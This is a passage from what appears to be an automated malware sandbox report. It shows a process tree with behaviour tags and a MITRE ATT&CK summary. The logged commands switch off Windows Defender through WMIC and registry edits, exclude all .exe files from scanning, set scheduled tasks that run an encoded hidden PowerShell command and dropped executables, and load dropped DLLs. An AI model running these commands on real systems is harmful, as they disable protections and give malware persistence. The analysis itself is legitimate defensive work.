C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:13012
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:13300
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:13684
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:15032
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"3⤵PID:6764
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&4⤵PID:3148
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:325⤵PID:9400
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:645⤵PID:10148
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"3⤵PID:7216
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&4⤵PID:3104
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:325⤵PID:9508
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:645⤵PID:9948
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gbcrHBMVq" /SC once /ST 01:32:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:6292
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bDBWsoVwBAvMkkOeMa" /SC once /ST 06:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\YIhRuNolBGOHadBpz\nnWxgLQozaxYwkg\qAoVzGW.exe\" rF /site_id 668658 /S" /V1 /F3⤵
- Creates scheduled task(s)
PID:10052
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Documents and Settings\msedge.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6668
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 6932 -ip 69321⤵PID:6532
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 8928 -ip 89281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8800
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Bedavishala" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\3f-667b0-863-e399b-fdcd9ca876075\Kenessey\Bedavishala.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4824
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 816 -p 8128 -ip 81281⤵PID:6940
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 6812 -ip 68121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7820
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 8824 -ip 88241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6340
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 808 -p 1880 -ip 18801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1036
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6940 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True2⤵PID:2020
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True3⤵PID:8552
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:7676 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:8364 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8364 -s 4523⤵
- Program crash
- Checks processor information in registry
PID:8064
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 8364 -ip 83641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7576
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:7860 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:5976 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5976 -s 4523⤵
- Program crash
PID:9544
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5976 -ip 59761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7264
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 600 -p 4548 -ip 45481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8900
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
PID:5728 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
PID:3152 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1412
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 828 -p 3152 -ip 31521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:9688
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 8688 -ip 86881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4768
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 540 -p 6052 -ip 60521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:10040
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 836 -p 5940 -ip 59401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:10032
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:1388
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 7788 -ip 77881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7912
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 7944 -ip 79441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7712
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 864 -p 5540 -ip 55401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:10640
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 800 -p 9708 -ip 97081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:10712
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:12100 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:12136 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12136 -s 4163⤵
- Program crash
- Checks processor information in registry
PID:12456
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 868 -p 12136 -ip 121361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:12228
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 13592 -ip 135921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:14312
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:14744 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:14784 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 14784 -s 4523⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:14956
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 14784 -ip 147841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:14868
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 816 -p 14724 -ip 147241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:15300
-
C:\Users\Admin\AppData\Local\Temp\F7C5.exeC:\Users\Admin\AppData\Local\Temp\F7C5.exe1⤵
- Suspicious use of SetThreadContext
PID:15396 -
C:\Users\Admin\AppData\Local\Temp\F7C5.exeC:\Users\Admin\AppData\Local\Temp\F7C5.exe2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:15756
-
-
C:\Users\Admin\AppData\Local\Temp\9D7.exeC:\Users\Admin\AppData\Local\Temp\9D7.exe1⤵
- Suspicious use of SetThreadContext
PID:15948 -
C:\Users\Admin\AppData\Local\Temp\9D7.exeC:\Users\Admin\AppData\Local\Temp\9D7.exe2⤵PID:16704
-
-
C:\Users\Admin\AppData\Local\Temp\2436.exeC:\Users\Admin\AppData\Local\Temp\2436.exe1⤵PID:16856
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 16856 -s 2962⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:17244
-
-
C:\Users\Admin\AppData\Local\Temp\2CA3.exeC:\Users\Admin\AppData\Local\Temp\2CA3.exe1⤵PID:17068
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 17068 -s 2962⤵
- Program crash
- Checks processor information in registry
PID:18104
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 836 -p 16856 -ip 168561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:17120
-
C:\Users\Admin\AppData\Local\Temp\3B2B.exeC:\Users\Admin\AppData\Local\Temp\3B2B.exe1⤵PID:17508
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 17508 -s 3202⤵
- Program crash
- Enumerates system info in registry
PID:18652
-
-
C:\Users\Admin\AppData\Local\Temp\4240.exeC:\Users\Admin\AppData\Local\Temp\4240.exe1⤵PID:17720
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 17720 -s 3202⤵
- Program crash
- Checks processor information in registry
PID:18216
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 17068 -ip 170681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:18052
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 17720 -ip 177201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:18120
-
C:\Users\Admin\AppData\Local\Temp\5646.exeC:\Users\Admin\AppData\Local\Temp\5646.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
PID:18180 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\nAOFCUIKIyewF & timeout 4 & del /f /q "C:\Users\Admin\AppData\Local\Temp\5646.exe"2⤵PID:18904
-
-
C:\Users\Admin\AppData\Local\Temp\5EE2.exeC:\Users\Admin\AppData\Local\Temp\5EE2.exe1⤵PID:18360
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 18360 -s 2962⤵
- Program crash
PID:18780
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 17508 -ip 175081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:18532
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 816 -p 18360 -ip 183601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:18692
-
C:\Users\Admin\AppData\Local\Temp\6DD7.exeC:\Users\Admin\AppData\Local\Temp\6DD7.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:18824
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Winlogon Helper DLL
1Defense Evasion
Disabling Security Tools
1Install Root Certificate
1Modify Registry
4Virtualization/Sandbox Evasion
1Web Service
1